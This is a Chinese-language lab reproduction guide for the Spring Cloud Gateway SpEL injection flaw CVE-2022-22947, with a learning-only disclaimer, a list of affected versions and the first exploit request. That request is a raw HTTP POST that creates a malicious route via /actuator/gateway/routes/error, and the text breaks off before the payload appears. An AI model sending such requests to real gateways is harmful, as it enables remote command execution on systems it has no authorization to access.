Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
漏洞简介
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
漏洞影响
Spring Cloud Gateway
3.1.0
3.0.0 to 3.0.6
更早的官方不再支持的版本
漏洞复现
漏洞环境:vulhub或vulfocus
依次发送如下请求包:
1、以POST方法请求
/actuator/gateway/routes/error
并提交以下数据,用于创建一条恶意路由
POST /actuator/gateway/routes/error HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content